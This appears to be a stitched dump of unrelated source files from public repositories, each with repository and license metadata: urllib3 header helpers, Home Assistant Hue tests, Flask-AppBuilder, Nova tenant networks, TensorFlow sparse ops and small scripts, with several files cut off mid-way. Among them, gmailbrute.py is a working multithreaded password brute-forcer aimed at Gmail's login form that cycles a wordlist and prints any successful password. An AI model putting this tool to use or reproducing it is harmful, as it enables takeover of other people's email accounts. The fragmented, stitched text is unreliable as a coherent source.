self.assertEqual('b', node.attr)
if __name__ == '__main__':
test.main()
|
knightmare2600/d4rkc0de
|
bruteforce/gmailbrute.py
|
Python
|
gpl-2.0
| 2,738
| 0.039445
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsea
|
rch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
|
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
adijo/rosalind
|
old/gene_enumerations.py
|
Python
|
gpl-2.0
| 682
| 0.014663
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
n = int(raw_input())
def make_set(n):
set = []
for x in range(1,n+1):
set += [x]
return set
def plusAndMinusPermutations(items):
for p in permutations(items,len(items)):
for signs in product([-1,1], repeat=len(items)):
yield [a*s
|
ign for a,si
|
gn in zip(p,signs)]
def array_to_string(list):
string = ""
string += str(list[0]) + " " + str(list[1])
return string
count = 0
for x in plusAndMinusPermutations(make_set(n)):
print array_to_string(x)
count += 1
print count
|
bmi-forum/bmi-pyre
|
pythia-0.8/packages/pyre/pyre/units/force.py
|
Python
|
gpl-2.0
| 545
| 0
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import me
|
ter, second
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
kave/Face-Off
|
face-off/settings/production.py
|
Python
|
cc0-1.0
| 866
| 0.001155
|
from .base import *
import dj_database_url
if os.environ.get('DEBUG') == 'False':
DEBUG = False
else:
DEBUG = True
try:
from .local import *
except ImportError:
pass
ALLOWED_HOSTS = ['*']
DATABASES = {'default': dj_database_url.config()}
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
STATICFILES_STORAGE = 'core.sto
|
rage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.
|
YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yuglify'
|
rpiotti/Flask-AppBuilder
|
flask_appbuilder/models/base.py
|
Python
|
bsd-3-clause
| 7,479
| 0.00107
|
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
"""
Base class for all data model interfaces.
Sub class it to implement your own interface for some data engine.
"""
obj = None
filter_converter_class = None
""" when sub classing override with your own custom filter converter """
""" Messages to display on CRUD Events """
|
add_row_message = lazy_gettext('Added Row')
edit_row_message = lazy_gettext('Changed Row')
delete_row_message = lazy_gettext('Deleted Row')
delete_integrit
|
y_error_message = lazy_gettext('Associated data exists, please delete them first')
add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
general_error_message = lazy_gettext('General Error')
""" Tuple with message and text with severity type ex: ("Added Row", "info") """
message = ()
def __init__(self, obj):
self.obj = obj
def _get_attr_value(self, item, col):
if not hasattr(item, col):
# it's an inner obj attr
return reduce(getattr, col.split('.'), item)
if hasattr(getattr(item, col), '__call__'):
# its a function
return getattr(item, col)()
else:
# its attribute
return getattr(item, col)
def get_filters(self, search_columns=None):
search_columns = search_columns or []
return Filters(self.filter_converter_class, self, search_columns)
def get_values_item(self, item, show_columns):
return [self._get_attr_value(item, col) for col in show_columns]
def _get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
retlst = []
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
retlst.append(retdict)
return retlst
def get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
yield retdict
def get_values_json(self, lst, list_columns):
"""
Converts list of objects from query to JSON
"""
result = []
for item in self.get_values(lst, list_columns):
for key, value in list(item.items()):
if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
value = value.isoformat()
item[key] = value
if isinstance(value, list):
item[key] = [str(v) for v in value]
result.append(item)
return result
"""
Returns the models class name
useful for auto title on views
"""
@property
def model_name(self):
return self.obj.__class__.__name__
"""
Next methods must be overridden
"""
def query(self, filters=None, order_column='', order_direction='',
page=None, page_size=None):
pass
def is_image(self, col_name):
return False
def is_file(self, col_name):
return False
def is_gridfs_file(self, col_name):
return False
def is_gridfs_image(self, col_name):
return False
def is_string(self, col_name):
return False
def is_text(self, col_name):
return False
def is_integer(self, col_name):
return False
def is_float(self, col_name):
return False
def is_boolean(self, col_name):
return False
def is_date(self, col_name):
return False
def is_datetime(self, col_name):
return False
def is_relation(self, prop):
return False
def is_relation_col(self, col):
return False
def is_relation_many_to_one(self, prop):
return False
def is_relation_many_to_many(self, prop):
return False
def is_relation_one_to_one(self, prop):
return False
def is_relation_one_to_many(self, prop):
return False
def is_nullable(self, col_name):
return True
def is_unique(self, col_name):
return False
def is_pk(self, col_name):
return False
def is_fk(self, col_name):
return False
def get_max_length(self, col_name):
return -1
def get_min_length(self, col_name):
return -1
"""
-----------------------------------------
FUNCTIONS FOR CRUD OPERATIONS
-----------------------------------------
"""
def add(self, item):
"""
Adds object
"""
raise NotImplementedError
def edit(self, item):
"""
Edit (change) object
"""
raise NotImplementedError
def delete(self, item):
"""
Deletes object
"""
raise NotImplementedError
def get_col_default(self, col_name):
pass
def get_keys(self, lst):
"""
return a list of pk values from object list
"""
pk_name = self.get_pk_name()
return [getattr(item, pk_name) for item in lst]
def get_pk_name(self, item):
"""
Returns the primary key name
"""
raise NotImplementedError
def get_pk_value(self, item):
return getattr(item, self.get_pk_name())
def get(self, pk):
"""
return the record from key
"""
pass
def get_related_model(self, prop):
raise NotImplementedError
def get_related_interface(self, col_name):
"""
Returns a BaseInterface for the related model
of column name.
:param col_name: Column name with relation
:return: BaseInterface
"""
raise NotImplementedError
def get_related_obj(self, col_name, value):
raise NotImplementedError
def get_related_fk(self, model):
raise NotImplementedError
def get_columns_list(self):
"""
Returns a list of all the columns names
"""
return []
def get_user_columns_list(self):
"""
Returns a list of user viewable columns names
"""
return self.get_columns_list()
def get_search_columns_list(self):
"""
Returns a list of searchable columns names
"""
return []
def get_order_columns_list(self, list_columns=None):
"""
Returns a list of order columns names
"""
return []
def get_relation_fk(self, prop):
pass
|
cbrafter/CrowdTLL
|
generalCode/sumoConfigGen.py
|
Python
|
gpl-3.0
| 1,642
| 0.001827
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
exportPath='../', AVratio=0, stepSize=0.01,
run=0, port=8813):
configXML = open(configFile, 'w')
print >> configXML, """<configuration>
<input>
<net-file value="{model}.net.xml"/>
<route-files value="{model}.rou.xml"/>
<gui-settings-file value="gui-settings.cfg"/>
<game value="1"/>
<start value="1"/>
<!--additional-files value="{model}.det.xml"/-->
</input>
<output>
<!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
<!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
<!--<vehroute-
|
output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
<!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
</output>
<time>
<begin value="0"/>
<step-length value="{stepSz}"/>
</time>
<processing>
<!--TURN OFF TELEPORTING-->
<time-to-teleport value="-1"/>
</processing>
<report>
|
<no-step-log value="true"/>
<error-log value="logfile.txt"/>
</report>
<traci_server>
<remote-port value="{SUMOport}"/>
</traci_server>""".format(model=modelname, expPath=exportPath,
AVR=int(AVratio*100), stepSz=stepSize,
Nrun=run, SUMOport=port)
print >> configXML, "</configuration>"
configXML.close()
|
la0rg/Genum
|
GenumCore/vendor/urllib3/util/request.py
|
Python
|
mit
| 2,180
| 0.000917
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
|
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates
|
to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
|
mc10/project-euler
|
problem_2.py
|
Python
|
mit
| 430
| 0.025701
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
# Initial two elements
prev_term = 1
cur_term = 2
tem
|
p_sum = 2
while cur_term < max_value:
next_term = prev_term + cur_term
prev_term = cur_term
cur_term = next_term
if cur_term % 2
|
== 0:
temp_sum += cur_term
return temp_sum
print( sum_even_fibonacci( 4000000 ) )
|
titilambert/home-assistant
|
tests/components/hue/test_init.py
|
Python
|
apache-2.0
| 8,339
| 0.00024
|
"""Test Hue setup process."""
from unittest.mock import Mock
import pytest
from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component
from tests.async_mock import AsyncMock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
"""Mock bridge setup."""
with patch.object(hue, "HueBridge") as mock_bridge:
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
"""Test that we do not discover anything or try to set up a bridge."""
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
# No flows started
assert len(hass.config_entries.flow.async_progress()) == 0
# No configs stored
assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
"""Test we don't initiate a config entry if config bridge is known."""
MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
with patch.object(hue, "async_setup_entry", return_value=True):
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: [
{
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
{hue.CONF_HOST: "1.1.1.1"},
]
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
"1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
}
async def test_setup_defined_hosts_no_known_auth(hass):
"""Test we initiate config entry if config bridge is not known."""
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
async def test_config_passed_to_config_entry(hass):
"""Test that configured options for a host are loaded via config entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
mock_registry = Mock()
with patch.object(hue, "HueBridge") as mock_bridge, patch(
"homeassistant.helpers.device_registry.async_get_registry",
return_value=mock_registry,
):
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(
mac="mock-mac",
bridgeid="mock-bridgeid",
modelid="mock-modelid",
swversion="mock-swversion",
)
# Can't set name via kwargs
mock_bridge.return_value.api.config.name = "mock-name"
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
assert len(mock_bridge.mock_calls) == 2
p_hass, p_entry = mock_bridge.mock_calls[0][1]
assert p_hass is hass
assert p_entry is entry
assert len(mock_registry.mock_calls) == 1
assert mock_registry.mock_calls[0][2] == {
"config_entry_id": entry.entry_id,
"connections": {("mac", "mock-mac")},
"identifiers": {("hue", "mock-bridgeid")},
"manufacturer": "Signify",
"name": "mock-name",
"model": "mock-modelid",
"sw_version": "mock-swversion",
}
async def test_unload_entry(hass, mock_bridge_setup):
"""Test being able to unload an entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert len(mock_bridge_setup.mock_calls) == 1
mock_bridge_setup.async_reset = AsyncMock(return_value=True)
assert await hue.async_unload_entry(hass, entry)
assert len(mock_bridge_setup.async_reset.mock_calls) == 1
assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
"""Test we set unique ID if not
|
set yet."""
MockConfigEntry(
domain=hue.DOMAIN,
data={"host": "0.0.0.0"},
unique_id="mock-id",
source=config_
|
entries.SOURCE_IGNORE,
).add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert entry.unique_id == "mock-id"
assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
"""Test we remove config entry if another one has correct ID."""
correct_entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
)
correct_entry.add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
|
aspc/mainsite
|
aspc/folio/views.py
|
Python
|
mit
| 1,132
| 0.007951
|
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Http404
from aspc.folio.models import Page
class AttachedPageMixin(object):
def get_page(self):
try:
return Page.objects.get(slug=self.page_slug)
except Page.DoesNotExist:
return None
def get_context_data(self, **kwargs
|
):
context = super(AttachedPageMixin, self).get_context_data(**kwargs)
context['page'] = self.get_page()
return context
def page_view(request, slug_path):
'''slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$ '''
slug_parts = slug_path.rstrip('/').split('/')
p
|
ages = Page.objects.exclude(managed=True)
for part in slug_parts:
try:
new_page = pages.get(slug=part)
except Page.DoesNotExist:
raise Http404
else:
pages = new_page.page_set.all()
return render(request, "folio/page.html", {
"title": new_page.title,
"body": new_page.body,
"page": new_page,
"active_section": new_page.path()[0].slug,
})
|
shakamunyi/nova
|
nova/api/openstack/compute/plugins/v3/tenant_networks.py
|
Python
|
apache-2.0
| 8,183
| 0.000122
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
# NOTE(danms): Here, network should be an object, which could have come
# from neutron and thus be missing most of the attributes. Providing a
# default to get() avoids trying to lazy-load missing attributes.
return {"id": network.get("uuid", None) or network.get("id", None),
"cidr": str(network.get("cidr", None)),
"label": network.get("label", None)}
class TenantNetworkController(wsgi.Controller):
def __init__(self, network_api=None):
self.network_api = nova.network.API()
self._default_networks = []
def _refresh_default_networks(self):
self._default_networks = []
if CONF.use_neutron_default_nets == "True":
try:
self._default_networks = self._get_default_networks()
except Exception:
LOG.exception(_LE("Failed to get default networks"))
def _get_default_networks(self):
project_id = CONF.neutron_default_tenant_id
ctx = nova_context.RequestContext(user_id=None,
project_id=project_id)
networks = {}
for n in self.network_api.get_all(ctx):
networks[n['id']] = n['label']
return [{'id': k, 'label': v} for k, v in networks.iteritems()]
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
networks = list(self.network_api.get_all(context))
if not self._default_networks:
self._refresh_default_networks()
networks.extend(self._default_networks)
return {'networks': [network_dict(n) for n in networks]}
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
network = self.network_api.get(context, id)
except exception.NetworkNotFound:
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
return {'network': network_dict(network)}
@extensions.expected_errors((403, 404, 409))
@wsgi.response(202)
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
reservation = None
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=-1)
except Exception:
reservation = None
LOG.exception(_LE("Failed to update usages deallocating "
"network."))
def _rollback_quota(reservation):
if CONF.enable_network_quota and reservation:
QUOTAS.rollback(context, reservation)
try:
self.network_api.delete(context, id)
except exception.PolicyNotAuthorized as e:
_rollback_quota(reservation)
raise exc.HTTPForbidden(explanation=six.text_type(e))
except exception.NetworkInUse as e:
_rollback_quota(reservation)
raise exc.HTTPConflict(explanation=e.format_message())
except exception.NetworkNotFound:
_rollback_quota(reservation)
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
if CONF.enable_network_quota and reservation:
QUOTAS.commit(context, reservation)
@extensions.expected_errors((400, 403, 503))
def create(self, req, body):
if not body:
_msg = _("Missing request body")
raise exc.HTTPBadRequest(explanation=_msg)
context = req.environ["nova.context"]
authorize(context)
network = body["network"]
keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
"num_networks"]
kwargs = {k: network.get(k) for k in keys}
label = network["label"]
if not (kwargs["cidr"] or kwargs["cidr_v6"]):
msg = _("No CIDR requested")
raise exc.HTTPBadRequest(explanation=msg)
if kwargs["cidr"]:
try:
net = netaddr.IPNetwork(kwargs["cidr"])
if net.size < 4:
msg = _("Requested network does not contain "
"enough (2+) usable hosts")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrFormatError:
msg = _("CIDR is malformed.")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrConversionError:
msg = _("Address could not be converted.")
raise exc.HTTPBadRequest(explanation=msg)
networks = []
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many networks.")
raise exc.HTTPBadRequest(explanation=msg)
try:
networks = self.network_api.create(context,
label=label, **kwargs)
if CONF.enable_network_quota:
QUOTAS.commit(context, reservation)
except exception.PolicyNotAuthorized as e:
raise exc.HTTPForbidden(explanation=six.text_type(e))
except Exception:
if CONF.enable_network_quota:
QUOTAS.rollback(context, reservation)
msg = _("Create networks failed")
LOG.exception(msg, extra=network)
raise exc.HTTPServiceUnavailable(explanation=msg)
return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
"""Tenant-based Network Management Extension."""
name = "TenantNetworks"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS, TenantNetworkController())
return [ext]
def get_controller_extensions(self):
return []
def _sync_networks(context, project_id, session):
ctx = nova_context.RequestContext(user_id=None, project_id=project_id)
ctx = ctx.elevated()
networks = nova.network.api.API().get_all(ctx)
return dict(networks=len(networks))
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableReso
|
urce('networks',
|
_sync_networks,
'quota_networks'
|
tensorflow/graphics
|
tensorflow_graphics/geometry/__init__.py
|
Python
|
apache-2.0
| 1,274
| 0.005495
|
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Ver
|
sion 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distr
|
ibuted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
rafa1231518/CommunityBot
|
plugins/gabenizer/mentions.py
|
Python
|
gpl-3.0
| 499
| 0.02004
|
#!/bin/pytho
|
n2
# Script that replies to username mentions.
import time
import os
import cPickle
import sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
image = gabenizer.process_image(sys.argv[1], './pl
|
ugins/gabenizer/gabenface.png')
image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
main()
|
eaplatanios/tensorflow
|
tensorflow/python/ops/sparse_ops.py
|
Python
|
apache-2.0
| 82,052
| 0.002803
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Sparse Tensor Representation. See the @{$python/sparse_ops} guide.
@@SparseTensor
@@SparseTensorValue
@@sparse_to_dense
@@sparse_tensor_to_dense
@@sparse_to_indicator
@@sparse_merge
@@sparse_concat
@@sparse_reorder
@@sparse_reshape
@@sparse_slice
@@sparse_split
@@sparse_retain
@@sparse_reset_shape
@@sparse_fill_empty_rows
@@sparse_transpose
@@sparse_reduce_max
@@sparse_reduce_max_sparse
@@sparse_reduce_sum
@@sparse_reduce_sum_sparse
@@sparse_add
@@sparse_softmax
@@sparse_tensor_dense_matmul
@@sparse_maximum
@@sparse_minimum
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numbers
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_sparse_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import deprecation
